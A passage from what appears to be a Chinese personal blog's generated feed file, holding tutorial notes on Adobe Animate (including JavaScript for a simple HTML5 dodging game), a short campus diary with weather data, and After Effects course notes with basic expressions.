    • G 不透明度:100%-10%-50%-100%
    • E 不透明度:50%-100%-10%-50%
    • N 不透明度:10%-50%-100%-10%

    gif

    ​ 最终效果。

    【2-1-AN小白课】- 引导层建立投篮动画

    png

    ​ 导入篮球素材,转换为元件。

    png

    ​ 新建一个图层,用钢笔工具画一个路径。

    png

    ​ 将这个图层转换为引导层。

    png

    ​ 将篮球图层放到引导图层下面。

    png

    ​ 创建补间动画,设置补间效果,给它整一个逆时针 5 圈的旋转。

    gif

    ​ 最终效果。

    【2-2-AN小白课】- 遮罩图层建立地球仪

    png

    ​ 画布中新建一个图层,用椭圆工具画一个圆,放在地图动画的顶层,将这个图层设为遮罩层。

    gif

    ​ 最终效果。


    使用 AN 制作 HTML5 小游戏-教程 01【Adobe Animate CC】

    png

    ​ 新建一个 HTML5 Canvas 工程。

    png

    ​ 将临摹图导入工程中。

    png

    ​ 降低不透明度,上锁,再新建一个图层用于临摹。

    png

    ​ 用钢笔描绘人物,头,身体,手臂,手掌,臀部,腿,脚分别用 Ctrl + G 结组。

    ​ 双击某个组,可以单独编辑某个组。

    png

    ​ 用油漆桶工具一阵上色,如果发现某些区域上不了色,就检查路径是否闭合。

    使用 AN 制作 HTML5 小游戏-教程 02【Adobe Animate CC】

    png

    ​ 用各种工具描出背景。

    png

    ​ 给背景上色。关于阴影,可以先划线画出阴影区域,上色后再将线删去。

    png

    ​ 新建一个图层,画武器。

    png

    ​ 画按钮。转换成按钮元件。

    png

    ​ 转换后编辑它,会出现四个关键帧:弹起,指向,按下,点击。编辑它们。

    png

    ​ 水平翻转整一个左边的按钮。

    使用 AN 制作 HTML5 小游戏-教程 03【Adobe Animate CC】

    png

​ 使用 Ctrl + X 与 Ctrl + Shift + V 将人物各个部分放在各自的图层中。

    png

    ​ 将人物各个部分转换为元件。

    png

    ​ 按 Q 键调整元件的轴心位置。

    png

    ​ 制作传统补间动画。

    png

    ​ 一阵操作。

    png

    ​ 最后将整个人物的锚点放到他的头顶上。

    使用 AN 制作 HTML5 小游戏-教程 04【Adobe Animate CC】

    png

​ 对于按钮,设置好它的名称。(this.left 与 this.right)

    png

    ​ 给人物设置一个影片剪辑,设置好它的名称。(this.player

    png

​ 打开「代码片断」和「动作」窗口,设置按钮监听和人物绑定。

    var speed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }
• click 表示点击(按下并松开)时执行监听函数。
• tick 表示每一帧都会执行一次监听函数。

​ 之后就是按下按钮(this.left、this.right)或对应按键,使人物(this.player)移动的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 05【Adobe Animate CC】

    png

​ 给这几个武器都设好影片剪辑和名称。(weapon1、weapon2、weapon3、weapon4、weapon5)

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else // 武器下落
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 写好武器下落的逻辑。

    png

    ​ 可以给背景底端分离出一个图层在道具图层上方,以实现武器落入地表中的效果。

    使用 AN 制作 HTML5 小游戏-教程 06【Adobe Animate CC】

    png

    ​ 新建一个图层,制作 restart 按钮。

    png

    png

    ​ 命名为 restart

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
this.weapon1.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    if(WE.y >= 1000) // 掉出界外
    {
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 使用代码设置按钮监听。

    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    ​ 没挂的时候隐藏 restart 按钮,挂的时候显示 restart 按钮。

    function onRestart()
    {
    alive = true;
this.weapon1.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    ​ 重置游戏的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 07【Adobe Animate CC】

    png

    ​ 新建一个图层,新建一个文本对象,设为 动态文本,然后将对象命名为 scoreText

    png

    ​ 给人物移动动画最顶端加一个图层,用于放代码,前面几帧设置标签名 run

    png

    ​ 最后在尾巴新建一个关键帧,命名为 end

    png

​ 第 20 帧设置代码 this.gotoAndPlay("run"),表示播放到这一帧后跳回标签 run 处重新播放。

    png

    ​ 第 21 帧设置代码 this.stop(),表示停止动画。

    png

    ​ 在第 21 帧,选中人头的图层,Ctrl + B 分离后,画一个被击中的表情。

    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;
    var score = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
this.weapon1.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    score = 0;
    this.player.gotoAndPlay("run");
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    this.scoreText.text = "Score: " + score;
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    MC.gotoAndStop("end");
    }
    if(WE.y >= 1000) // 掉出界外
    {
    score += 1;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 最终代码。

    • 主要就是重新开始时:this.player.gotoAndPlay("run"),恢复人物动画。

    • 碰到武器时:MC.gotoAndStop("end");,跳到第 21 帧。


​ 最终效果。可以在 hexo 上跑,但是当时画布设置得太大了 orz……


    ​ 修改画布大小,网页中:

    • 因为新建的画布是 16:9 的,所以宽度设为 100%,画布 padding-bottom 设为 56.25%(代替 height):
    • margin: 0 auto; 居中对齐。
    <!-- write your code here -->
    <body onload="init();" style="margin:0px;">
    <div id="animation_container" style="background-color:rgba(255, 255, 255, 1.00); width:100%;padding-bottom: 56.25%;height: 0;margin: 0 auto;">
    <canvas id="canvas" width="1920" height="1080" style=";margin: 0 auto;display: block; background-color:rgba(255, 255, 255, 1.00);"></canvas>
    <div id="dom_overlay_container" style="pointer-events:none; overflow:hidden; width:1920px; height:1080px; position: absolute; left: 0px; top: 0px; display: block;">
    </div>
    </div>
    </body>

​ Game.js 中(domContainers 为 Animate 导出模板的自适应缩放逻辑里已有的容器数组):

    domContainers.forEach(function(container) {
    container.style.width = '100%';
    });

    ​ 开跑!


/posts/Diary-7-%E6%87%92%E6%B4%8B%E6%B4%8B/

前言

    ​ 这段时间好像没有发生什么特别值得我记录的事情,写英语 / 学习 Adobe 全家桶交替循环。

    jpg

    梧桐与银杏

    ​ 银杏叶子都寄了。

    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [-7, -8, -9, -10, -9, -8, -7, -6, -5, -5, -4, 0, -3, -5] # 当日最低温
    y2 = [10, 10, 4, 3, 6, 7, 10, 10, 10, 12, 14, 20, 8, 2] # 当日最高温
    y3 = [144, 105, 43, 73, 75, 105, 144, 143, 89, 208, 112, 154, 115, 53] # 当日 PM 值

    png

    正文

    11.27

​ 给论文打了个草稿,跟导师汇报了下,虽然效果就那样,也得开始写了吧。

    ​ 智算中心的算力被我造得差不多了,申请下一批算力要到十二月中了,实验得停滞一段时间了。

    11.28

    ​ 六级考试快到了,要不去图书馆刷刷英语吧。

    ​ 这论文无聊得我宁愿去图书馆写英语都不想写论文了。

    ​ 这段时间非常困倦,困得我想冬眠。

    12.1

    jpg

    咸鱼

    ​ 气温已经零下很久了,东湖表面已经结了厚厚的冰。这只咸鱼是怎么被冻在湖里的?

    12.2

    jpg

    啊!真有家乡的味道!

    ​ 食堂饺子店的酱油和蒜头酱的蘸料配起来感觉不好吃,直接买了包番茄酱制作外地人不能接受的黑暗料理😇,味道真是好极了!

    12.5

    jpg

    没啥人啊

​ 这段时间应该是考研党的冲刺时刻了,而冀大的图书馆一早却没什么人?不知道是考研的人少了还是大家都起不来了。

    12.6

    ​ 组会上导师说周六要下雪,关某心心念念的下雪终于要见到了。

    12.10

​ 结果还是没下,真是太不走运了!

    ​ 晚上下了很大的雪,真是太走运了!

/posts/Software-AE/

资源

    课程

    【00-AE 先导课】- 怎么学习 AE 最高效

    • 基础篇
    • 动画篇
    • 特效篇
    • 表达式
    • 实战篇

    【01-AE 概念篇】- 从 AE 的合成开始讲起

    png

    ​ 对于预设:

    • 电视制式
      • PAL 制:每秒 25 帧,隔行扫描。中国、德国、英国等国家采用这种制式。
      • NTSC 制:每秒 29.97 帧,隔行扫描。美国、加拿大和日本等国家采用这种制式。

    ​ 持续时间单位:时:分:秒:帧
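    举个换算的例子(假设的示例值):在 PAL(25 fps)下,时间码 0:00:02:13 表示第 2 秒又 13 帧,即 2 + 13 ÷ 25 = 2.52 秒。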


    本章总结
    • AE 的用途
      AE 是一款面向高端视频特效的专业合成软件:对收集到的素材进行数字化的编辑与组合,再经过艺术性的再加工,得到最终作品。


    • 帧是影像动画中最小单位的单幅影像画面,相当于电影胶片上的每一格镜头。一帧就是一幅静止的画面,连续的帧就形成动画,如电视图像等。

    • 帧速率
      在 1 秒钟时间里传输的图片的帧数,也可以理解为图形处理器每秒钟能够刷新几次,通常用 fps (Frames Per Second) 表示。

    • 关键帧
      是编辑动画和处理特效的核心技术。关键帧记录动画或特效的特征及参数,中间画面的参数则由计算机自动运算并添加。

    • 高清视频
      物理分辨率达到 720p 以上统称为高清,简称 HD(High Definition)。国际上公认的高清标准有两条:视频垂直分辨率达到 720p 或 1080i;视频宽高比为 16:9。全高清(Full HD)指物理分辨率达到 1920 x 1080。

    • 常用视频格式

      • AVI (Audio Video Interlaced) 格式
      • MOV 格式
      • MPEG 格式
      • WMV 格式
      • MP4 格式(编码格式:H.264)
      • TGA 序列文件
    • 常用音频格式

      • WAV 格式
      • MP3 格式

    【AME 教程】『只用5分钟 , Adobe MediaEncoder工具彻底参透』告别格式工厂!专业级队列渲染/格式转码工具最基础教程


    ​ Adobe Media Encoder 是一个视频和音频编码应用程序,可以针对不同应用程序和观众,以各种分发格式对音频和视频文件进行编码。

    • 格式转换(类似格式工厂)
    • 分队列渲染(由 PR / AE 中导出队列)
    • 批量监视
    • 预设编译(渲染指定预设的视频,如 Youtube 预设)

    【02-AE 概念课】- AE 工具栏都有什么样用

    ​ 教你熟悉 AE 的各种工具,跟 PS 和 AI 差不多吧。

    ​ 按 Alt 和工具键切换工具。

    png

    ​ 创建蒙版。


    ​ 层级:项目 > 合成 > 图层


    png

    ​ 调整对象属性。

    【03-AE 实战课】- AE 关键帧动画基础概念

    png

    ​ 可以让物体沿着某个钢笔路径进行移动。


    ​ 多选多个关键帧,Alt 可以对关键帧动画进行缩放。

    png

    时间反向关键帧,可以将关键帧动画倒序。


    本章总结
    • 时间轴面板

      • 修改合成设置(快捷键 - Ctrl + K)
        可以对现有合成的参数进行修改
      • 预览 / 暂停视频(快捷键 - 空格键)
        播放时间轴上的画面
      • 设定预览长度(快捷键 - B / N)
        确定预览的时间长度,B 是入点,N 是出点
      • 调整显示比例(快捷键 - Alt + 鼠标滚轮)
        调节时间线面板中时间线显示比例的大小
      • 逐帧调节时间线(快捷键 - Page Up / Page Down)
        可以逐帧移动时间线
      • 分隔素材(快捷键 - Ctrl + Shift + D)
        在当前时间点,对当前素材进行分隔
      • 裁剪素材(快捷键 - Alt + [ / ])
        在当前时间点,对素材进行裁剪
    • 关键帧动画

      • 图层位置属性(快捷键 - P)
        可以对图层的位移进行调整
      • 图层缩放属性(快捷键 - S)
        可以调节图层的缩放数值
      • 图层中心点属性(快捷键 - Y)
        调节素材中心点的位置
      • 图层旋转属性(快捷键 - R)
        可以调出旋转属性,对素材进行旋转调整
      • 图层透明度属性(快捷键 - T)
        调出透明度属性,对素材的透明度进行调整
      • 查看关键帧(快捷键 - U)
        可以查看图层已经创建的全部关键帧
      • 查看上一帧 / 下一帧(快捷键 - J / K)
        直接跳到前一个或后一个关键帧

    【04-AE 实战课】- AE 关键帧动画基础练习 - 街道汽车超车

    png

    ​ 导入 PSD 格式的素材时,导入种类选择 合成-保持图层大小

    png

    ​ 首选项中把摄像机导航关了,避免快捷键冲突。

    png

    ​ 就是制作简单的帧动画了。

    Shift + 数字键(非小键盘) 设定标记时间,数字键(非小键盘) 转到对应标记时间。(记住不要在中文输入法下!)

    gif

    ​ 最终效果。


    本章总结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 调整背景图层的大小,使背景图层比合成要大。
      • 调整小车的大小,使车的大小与马路大小相互协调。
    • 制作动画
      • 在时间线 0s 时,把绿车放在合成左端并移出合成外,单击位置属性下的关键帧秒表,记录当前绿车的位置。
      • 在时间线 10s 时,将绿车水平移动到合成右端并移出合成外,自动记录当前绿车的位置,完成绿车的位移动画。
      • 在时间线 0s 时,把黄车放在绿车的左边,单击位置属性下的关键帧秒表,记录当前黄车的位置。
      • 在时间线 4~7s 之间选择合适时间点,移动黄车的位置,使黄车位置处于另外一条马路。
      • 在时间线 9s 时,将黄车水平移动到绿车右边,使黄车在更短的时间内完成更远的距离,做出黄车的加速动画。
      • 调整黄车路径细节,使黄车超车的动画更加顺畅。

    【05-AE 实战课】- AE 基础效果湍流置换 - 制作奶茶动画

    png

    ​ 如果在图像图层上直接使用钢笔工具,会给这个图层画蒙版。

    png

    ​ 新建一个矩形,在 效果与预设 中,设定 湍流置换

    ​ 通过操作湍流置换里的参数(数量 / 大小 / 偏移(湍流)/ 复杂度 / 演化),达到水波的效果。

    png

    ​ 选择图层,Ctrl + D 复制一份,换个颜色。

    png

    选择两个图层,Ctrl + Shift + C 预合成,相当于将两个图层合并在一起。

    png

    ​ 用钢笔工具建立 形状图层 1,画出奶茶杯的区域。

    F4 显示轨道遮罩选项,将 预合成 1 的轨道遮罩设为 形状图层 1

    png

    ​ 修改位移的时间轴动画。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到茶 1、茶 2 两个图层。
    • 制作动画
      • 用矩形工具创建一个矩形,颜色可以自行选择。
      • 找到效果-扭曲-湍流置换效果,添加在当前矩形的图层上。
      • 调整数量、大小等参数,使波形适合需要的效果。
      • 对演化参数创建关键帧,选择需要的时间点创建关键帧动画。
      • 把当前矩形复制一层,修改颜色,调整湍流置换的参数,使其波纹的形态和前一层有所区别。
      • 将两个图层嵌套在一个合成里,对合成的位移属性进行 k 帧,达到从上至下的效果。
      • 使用钢笔工具创建一个杯子的形状,用合成和该形状创建剪切蒙版。
      • 预览动画效果,调整细节。

    【06-AE 实战课】- AE 基础效果集 - 制作 HELLO SUMMER 动画

    png

    ​ 导入素材,Ctrl + K 调整画布宽高。

    png

    ​ 给水影子整一个湍流置换。

    png

    ​ 修改湍流置换的参数整一个关键帧动画。

    png

    ​ 设定父级,方便操作,整一个旋转的关键帧动画。

    png

    人偶控制点工具(Ctrl + P),类似骨骼动画。

    png

    ​ 可以调节变换曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“泳池.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到水影子、水波纹两个图层。
    • 制作动画
      • 为水影子、水波纹两个图层添加“湍流置换”效果,调整细节参数,创建关键帧动画。
      • 反复预览动画效果,调节参数细节,达到自己想要的效果。
      • 将水影子、水波纹两个图层预合成 (Ctrl + Shift + C)
      • 复制泳池底图层,利用泳池底图层对刚刚的预合成进行剪切蒙版,控制波形范围。
      • 找到人物的几个图层,将其预合成 (Ctrl + Shift + C)
      • 为人物图层添加“湍流置换”效果,调整细节参数。波形变化幅度不用太大。
      • 用不同的方法,为环境中其他的元素添加小动画。
      • 预览动画效果,调整细节。

    【07-AE 实战课】- AE 线性动画和非线性动画基础概念

    png

    ​ 可以给物体打开运动模糊。

    ​ 按 F9 给关键帧动画增加缓动效果,曲线编辑器中可以调整位置曲线与速度曲线。

    ​ 高中物理告诉我们,速度是位移对时间求导。


    本章小结
    • 缓动动画(快捷键 - F9)

      自然界中的物体从起点移动到终点时,速度从来不是一成不变的:汽车启动时速度会由慢变快,停止时则由快变慢;篮球落地时会在地上来回反弹,并逐渐停止运动。要制作出更加自然的动画,就需要理解什么是缓动函数。简单来说,缓动函数用于控制动画从初始值运动到最终值的速率,适当地使用缓动函数能让观众得到更舒适的视觉体验。先用 F9 将选中的关键帧变为平滑帧,点击图表编辑器图标,在图表编辑器面板中单击右键选择编辑速度图表,即可调整运动的快慢。

    • 运动模糊

      打开运动模糊标签开关后,快速运动的物体会产生一定的模糊效果。在图层开关栏中打开该图层的运动模糊开关,再在时间线面板中打开运动模糊总开关,即可看到效果。

    【08-AE 实战课】- AE 日夜交替 UI 风动画制作

    png

    ​ 导入白天和夜晚两个合成,再将这俩结合成一个合成(相当于文件夹里套文件夹)。

    png

    png

    ​ 给开关移动制作帧动画,文字透明度制作帧动画。

    png

    新建一个圆,给白天的合成做反向蒙版。

    png

    ​ 修改速度曲线,先快后慢。

    png

    ​ 设置运动模糊。

    png

    ​ 继续修改速度曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 选取同时有白天和夜晚两种形态的素材。
      • 思考动画效果,整理图层,并以合成的形式导入 AE。
    • 制作动画
      • 给按钮图层制作往复的位移动画。
      • 按照按钮的动画节点,把文字添加相应的不透明度动画。
      • 确保白天和夜晚两个合成内,按钮的动画一致。
      • 在夜晚的合成中,寻找合适的时间点为月亮添加位移动画。
      • 为白天的合成,添加蒙版,通过蒙版的缩放动画,完成日夜交替的效果。
      • 将所有的关键帧调整为平滑帧,调节速度曲线,达到自己想要的效果。
      • 给做了动效的图层打开运动模糊,打开运动模糊的总开关。
      • 预览动画效果,调整细节。

    【09-AE 实战课】- AE 创意合成海底世界

    png

    ​ 导入视频素材,调整色调,将黑色映射到深蓝。

    png

    ​ 调整曲线。

    ​ 教程给的 Trapcode 和 Universe 插件太老了,自己上网再整一个吧。

    png

    ​ 设置水色光(浅绿色),继续调整曲线。

    png

    ​ 增加效果 Heatwave 以增加斑驳感。

    png

    ​ 顶层新建一个纯色,添加效果 Optical Flares,整一个耶稣光。

    png

    ​ 混合模式选择 屏幕,把黑色给我删了。

    png

    ​ 调整 Optical Flares 的帧动画:旋转偏移、动画演变。

    png

    ​ 顶层新建一个纯色图层,整一个湍流杂色。

    png

    CC Vector Blur 增加模糊效果。

    ​ 使用叠加效果。

    png

    ​ 多复制几个。

    png

    ​ 如果要多个图层共用一个效果,新建一个调整图层。

    png

    ​ 调整图层里放好效果,放在要应用效果图层的顶端。

    png

    ​ 导入 png 序列。

    png

    ​ 水平翻转。

    png

    ​ 适合复合帮你缩放到合适大小。

    png

    ​ 给水母整一个帧动画。

    png

    CC Particle Systems II,跟 Unity / Blender 里的粒子系统差不多。

    png

    ​ 一阵操作整一个气泡效果。

    png

    ​ 最后再整一个 CC Lens,镜头扭曲。

    gif

    ​ 最终效果。


    本章小结
    • 制作动画
      • 导入“城堡.mp4”素材,新建调整图层。
      • 在调整图层上添加“色调”和“曲线”两个效果,将城堡的整体色调调整为比较暗的蓝色。
      • 在调整图层上添加“Shine”效果,调整光源位置,更改着色模式为水色光。
      • 在调整图层上添加“uni.Heatwave”效果,让海底有一种热浪的感觉,观察整体效果,适当调整色调和曲线。
      • 新建纯色层,添加“OpticalFlares”效果,增加海平面透光的效果,调整光源位置和细节参数。
      • 新建纯色层,添加“湍流杂色”制作水波反射效果,添加“CCVectorBlur”使其更逼真。
      • 复制几层水波纹反射图层,打开水波纹反射图层的三维属性,调整到合适的位置。
      • 新建纯色层,添加“CCParticle System II”效果,修改参数制作海底气泡效果。
      • 添加海底生物素材,使画面更丰富,海底生物的素材应该放在调整图层的下方。
      • 将所有图层预合成,并添加“CCLens”效果,使其有一点变形的感觉。
      • 为视频添加音效和环境音,让整体画面更加和谐。

    【10-AE 表达式】- 抖动表达式 Wiggle 的基础用法

    png

    以 合成 - 保持图层大小 导入素材,图层选项选择 可编辑的图层样式。

    png

    将表情打成一个预合成,按 Alt + 左键 点击秒表,调出表达式,选择 Property - wiggle(freq, amp, octaves = 1, amp_mult = .5, t = time)。

    png

    wiggle(100, 6)

    设置 freq=100,amp=6,即每秒抖动 100 次、振幅 6。(一个只抖单轴的常见变体示意见下。)
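    顺手记一个变体的示意(假设表达式挂在 Position 上;value 是该属性的原值,写法为通用的 AE 表达式,非课程代码):

    // 示意:只在 y 轴上抖动,x 保持原值
    w = wiggle(100, 6);
    [value[0], w[1]]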

    png

    ​ 将双眼打成一个预合成。

    png

    ​ 给眼睛整一个帧动画。

    png

    F9 改成缓动,修改速度曲线。

    gif

    ​ 最终效果。

    【11-AE 表达式】- 循环表达式 loopOut 的基础用法

    png

    以 合成 - 保持图层大小 来导入 .ai 文件。

    png

    ​ 将钟摆的锚点挪到最上方。

    png

    loopOut("Cycle")

    设置三个关键帧(左摆 - 右摆 - 左摆),并设置表达式 loopOut("cycle")。

    ​ 就会得到循环的动画。

    png

    loopOut("PingPong")

    设置两个关键帧(左摆 - 右摆),设置表达式 loopOut("pingpong")。

    它会自动把动画倒序再播一遍,得到跟上一版一样的效果。(两种写法的对比示意见下。)
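    两种循环方式的对比示意(假设挂在 Rotation 上,且已经打好往复的关键帧):

    loopOut("cycle");    // 播到最后一帧后跳回第一帧,整段正向重复
    // loopOut("pingpong"); // 正放到底再倒放回来,来回往复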

    gif

    ​ 最终效果。

    【12-AE 表达式】- 时间表达式 Time 的基础用法

    png

    ​ 用矩形工具画个斑纹,打成一个预合成。

    png

    ​ 添加 CC Sphere 效果,把分辨率调整成四分之一(这里 AE 容易崩溃)。

    ​ 微调旋转参数。

    png

    ​ 制作上下移动的帧动画。

    png

    ​ 调整曲线,先快后慢。

    png

    time * 360

    对 CC Sphere 的 Rotation Y 属性设置表达式 time * 360,它就会以每秒一圈(360°/s)的速度匀速旋转。(可调速的写法示意见下。)
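    如果想控制转速,可以把系数提出来(示意写法,speed 是假设的变量名):

    speed = 360;   // 每秒转过的角度,360 即一秒一圈
    time * speed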

    png

    ​ 用椭圆工具建一个阴影,调整缩放的帧动画。

    png

    ​ 调整不透明度的帧动画。

    gif

    ​ 最终效果。

    【13-AE 跟踪器】- AE 跟踪器给空间位置捆绑文本

    png

    ​ 新建一个相机。

    png

    ​ 界面变成 3D 的,之后的操作就跟 3D 引擎差不多了。

    png

    ​ 导入一个航拍视频,窗口里调出 跟踪器,点击 跟踪摄像机,电脑就会分析这个视频(光流估计?)生成若干 3D 标记点。

    png

    ​ 随便选一个点,创建文本和摄像机

    png

    ​ 此时就会创建一个文本的 3D 对象,操作它。

    png

    ​ 也可以选择三个点创建文本。

    png

    ​ 操作它。

    png

    ​ 给文本复制一个,添加描边并稍微向后移动一点距离,做一个 3D 文字阴影效果。

    gif

    ​ 最终效果。

    ]]>
    @@ -3886,10 +3886,10 @@ Adobe
    - GenJi
    - AE
    + GenJi
    +
    @@ -3915,10 +3915,10 @@ Adobe
    - AI
    - GenJi
    + AI
    +
    @@ -3982,7 +3982,7 @@ /posts/Exercise-%E5%B0%8F%E8%AE%BA%E6%96%87%E7%9B%B8%E5%85%B3/
    -
    ]]>
    +
    ]]>
    @@ -4009,7 +4009,7 @@ /posts/Diary-6-%E9%87%91%E7%81%BF%E7%81%BF/ - 前言
            

    jpg

    梧桐与银杏

    ​ 梧桐与银杏变化最大的一集。

    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [-5, -3, -1, 1, -4, -4, -4, -1, -1, -2, -9, -7, 3, -7] # 当日最低温
    y2 = [9, 11, 10, 11, 13, 13, 15, 16, 13, 16, 10, 2, -7, 5] # 当日最高温
    y3 = [79, 90, 188, 31, 61, 77, 84, 117, 24, 237, 103, 27, 48, 71] # 当日 PM 值

    png

    正文

    11.13

    ​ 在 ROCK HOME TOWN 玩猛了,脚底都磨出水泡了。

    ​ 日照香炉生紫烟,我在宿舍躺半天。

    11.15

    ​ 组会是牛凡汇报,非常的迅速!

    11.16

    你们南方没有冬天是不完整的。

    ——杰哥

    jpg

    遍地金黄

    ​ 在冀大的银杏树即将落光它的叶子前,记录一下最后的金灿灿吧。

    jpg

    1 x 3

    ​ 1 x 3 的组合图,2023 也快要结束了!

    jpg

    2 x 2

    2 x 2 的组合图制作起来明显比 1 x 1 的难度大得多,因为每张图要契合更多的周围信息。经过一阵拉变形和移花接木,总算让这张组合图看上去正常了些。

    ​ 4.5 那天拍的视角明显偏了,只好把它放在周围信息较少的左上角,不然看上去太突兀了。

    11.17

